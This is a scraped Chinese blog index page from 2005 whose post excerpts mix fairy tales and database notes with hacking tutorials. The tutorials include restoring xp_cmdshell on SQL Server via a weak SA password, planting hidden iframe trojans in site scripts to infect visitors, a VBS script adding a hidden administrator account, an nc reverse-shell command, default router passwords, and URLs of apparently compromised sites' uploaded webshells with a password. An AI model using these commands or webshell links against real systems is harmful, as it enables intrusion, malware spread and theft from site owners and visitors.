自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(17)
  • 资源 (13)
  • 收藏
  • 关注

原创 对1433端口SA权限的再突破- -

对1433端口SA权限的再突破作者:net    文章来源:net   org黑客X档案青野志狼有一篇文章>。文章写到了在知道sql服务器的SA用户名弱密码后,而服务器去掉了SA的xp_cmdshell权限的情况下,如何通过SQL命令恢复SA的xp_cmdshell权限来进行入侵。这样入侵(详细请看原文)的前提是服务器的xplog70.dll没有被删除或改名,这一点青野志狼也谈到了,但是他没有写在

2005-08-05 10:25:00 1331

原创 SQL恢复XP_CMDSHLL,以及XPLOG70.DLL被删,直接用SQL连接器开启3389

content>用SQL连接器恢复XP_CMDSHLLE的命令(1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname=xplog70.dll(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc xp_cmdshell,xpsql70.dll

2005-08-05 10:24:00 1761

转载 http://www.iam-flying.com/admin/ewebeditor/UploadFile/200571017610619.asa

http://www.iam-flying.com/admin/ewebeditor/UploadFile/200571017610619.asa

2005-07-10 17:15:00 1408

转载 http://www.yqrk.cn/my2006.asp

http://www.yqrk.cn/my2006.asphttp://www.yqrk.cn/tow5.asphttp://www.yqrk.cn/cctv/ewebeditor/UploadFile/2005710162725493.asahttp://www.yqrk.cn/cctv/ewebeditor/admin_style.aspwhjtobyfuckyou

2005-07-10 16:50:00 1031

转载 http://www.mycconline.com

http://www.mycconline.com/eWebEditor_v280_Free/eWebEditor_v280_Free/UploadFile/200571015580950.asahttp://www.mycconline.com/eWebEditor_v280_Free/eWebEditor_v280_Free/admin_style.aspwhjtobyfuckyou

2005-07-10 16:15:00 1735

转载 WEBSHELL 提权思路

哈!发现DVBBS7.1 论坛前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看!dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!没办法,试试!http://www.xxxx.com/bbs/databackup/20050406.mdbhttp://www.xxxx.com/bbs/databackup/20050

2005-06-18 20:58:00 1087

转载 小红帽

从前有个可爱的小姑娘,谁见了都喜欢,但最喜欢她的是她的奶奶,简直是她要什么就给她什么。一次,奶奶送给小姑娘一顶用丝绒做的小红帽,戴在她的头上正好合适。从此,姑娘再也不愿意戴任何别的帽子,于是大家便叫她“小红帽”。    一天,妈妈对小红帽说:“来,小红帽,这里有一块蛋糕和一瓶葡萄酒,快给奶奶送去,奶奶生病了,身子很虚弱,吃了这些就会好一些的。趁着现在天还没有热,赶紧动身吧。在路上要好好走,不要跑,

2005-06-17 06:53:00 1138

转载 青蛙王子

在遥远的古代,人们心中的美好愿望往往能够变成现实。就在那个令人神往的时代,曾经有过一位国王。国王有好几个女儿,个个都长得非常美丽;尤其是他的小女儿,更是美如天仙,就连见多识广的太阳,每次照在她脸上时,都对她的美丽感到惊诧不已。    国王的宫殿附近,有一片幽暗的大森林。在这片森林中的一棵老椴树下,有一个水潭,水潭很深。在天热的时候,小公主常常来到这片森林,坐在清凉的水潭边上。她坐在那里感到无聊的时

2005-06-17 06:40:00 1028

转载 玫瑰公主

以前,有个国王和王后一直没有孩子,他们为此非常伤心苦恼。有一天,王后正在河边散步,一条小鱼把头浮出水面对她说:“你的愿望就会实现了,不久你就会生下一个女儿的。”过了一段时间,那条小鱼所预言的情况真的实现了,王后真的生下了一个非常漂亮的女儿。国王高兴得时时刻刻爱不释手,决定举行一个大型宴会。他不仅邀请了他的亲戚、朋友和外宾,而且邀来了几乎所有的女巫师,让她们为他的女儿送来善良美好的祝愿。他的王国里一

2005-06-17 06:39:00 989

转载 白雪公主

严冬时节,鹅毛一样的大雪片在天空中到处飞舞着,有一个王后坐在王宫里的一扇窗子边,正在为她的女儿做针线活儿,寒风卷着雪片飘进了窗子,乌木窗台上飘落了不少雪花。她抬头向窗外望去,一不留神,针刺进了她的手指,红红的鲜血从针口流了出来,有三点血滴落在飘进窗子的雪花上。她若有所思地凝视着点缀在白雪上的鲜红血滴,又看了看乌木窗台,说道:“但愿我小女儿的皮肤长得白里透红,看起来就像这洁白的雪和鲜红的血一样,那么

2005-06-17 06:39:00 938

转载 网页木马收肉鸡隐藏一个框架网页

有了WEBSHELL拉,可以修改主页了,想在上面挂个网页木马收肉鸡,我这里有个很巧妙的方法,大家说的挂马也就是在页面上隐藏一个框架网页.....   先找找主页里面是否有JS的脚本,找到script language="javascript" src="xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)document.write(h

2005-06-16 12:22:00 1413

转载 vbs脚本加启动项提升webshell的管理权限

1.先用TXT文件写个shell.vbs,添加一个管理员,代码如下:on error resume nextset shell=createobject("wscript.shell")shell.run"cmd.exe /c net user ray$ /del",false,falseshell.run"cmd.exe /c net user ray$ 1984 /add",false,fal

2005-06-16 12:09:00 1643

转载 webshell里nc反向连接获得cmd shell的方法

在webshell里操作CMD很不爽,直接上传一个nc,打入以下命令:nc -vv 你的IP地址 8000 -e cmd.exe然后在本机用nc监听一个端口,命令如下:nc -vv -l -p 8000稍微等下,就会连接一个shell了.补充:以上只是示范命令,实际操作如在海洋2006里的WScript.Shell程序运行器中,一定要输入nc的绝对路径!例子:路径:E:/wwwroot/www/c

2005-06-16 12:07:00 2865

转载 通杀网页源代码加密

在地址栏或按Ctrl+O,输入:javascript:s=document.documentElement.outerHTML;document.write();document.body.innerText=s;源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果.

2005-06-01 12:55:00 1549

原创 SQL查询语句基础

SQL查询语句基础DataTrans-1500服务器是用SQL Server服务器作数据的底层管理,当用户对DataTrans-1500服务器进行查询时,服务器通过search.command命令文件以及.from检索途径对象来构造SQL查询语句,通过此SQL 查询语句来对SQL Server服务器发起检索。DataTrans-1500服务器的系统管理员,了解、掌握SQL查询语句的语法,能更好的作

2005-05-30 11:53:00 2093

转载 adsl 路由器默认密码

adsl  路由器默认密码 艾玛 701g 192.168.101.1  192.168.0.1 用户名:admin   密码:admin 用户名:SZIM    密码:SZIM 艾玛701H 192.168.1.1   10.0.0.2 用户名:admin 密码:epicrouter 实达2110EH ROUTER 192.168.10.1 用户名:user    密码:password 用户名

2005-05-22 15:58:00 1431

转载 数据库连接大全(摘自: http://www.connectionstrings.com/)

 SQL Server  ODBC  Standard Security:"Driver={SQL Server};Server=Aron1;Database=pubs;Uid=sa;Pwd=asdasd;"  Trusted connection:"Driver={SQL Server};Server=Aron1;Database=pubs;Trusted_Connection=yes;"  P

2005-04-29 09:19:00 1507

发一个能用的yui中文文档

能用的yui中文文档,基于2.7的。是一个 chm 文件。 希望对你的学习有所帮助。能用的yui中文文档能用的yui中文文档

2011-07-07

VB 可用指令、函数 索引表.chm,学asp用的到。

VB 可用指令、函数 索引表.chm,学asp用的到。

2009-01-06

Jpage分页 .net2.0版 通用.net2.0分页程序.rar

Jpage分页 .net2.0版 通用.net2.0分页程序.rar

2009-01-06

多文件上传自定义控件.rar 给大家参考

多文件上传自定义控件.rar,希望有用。

2009-01-06

CHM文档生成器及其所有的C#源代码.rar

CHM文档生成器及其所有的C#源代码.rar

2009-01-06

C#开发终端式短信,可以参考。

C#开发终端式短信,有用到的可以看看,可以参考。

2009-01-06

asp.net专家疑难解答200问

asp.net专家疑难解答200问,非常不错。新手可以看看。

2009-01-06

免费开源大文件上传 .net

免费开源大文件上传webb.wave.controls.upload2

2008-12-10

51aspx无刷新仿google波形扭曲彩色Asp.net验证码

51aspx无刷新仿google波形扭曲彩色Asp.net验证码

2008-12-10

ActionScript 2.0字典CHM中文版.chm

ActionScript 2.0字典CHM中文版.chm

2008-12-10

ASP精华文章-asp教程

ASP精华文章 ASP 精华 教程 资料

2008-12-10

最全的一套ASP教程

ASP 教程 帮助 指南 ASP 教程 帮助 指南

2008-12-10

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除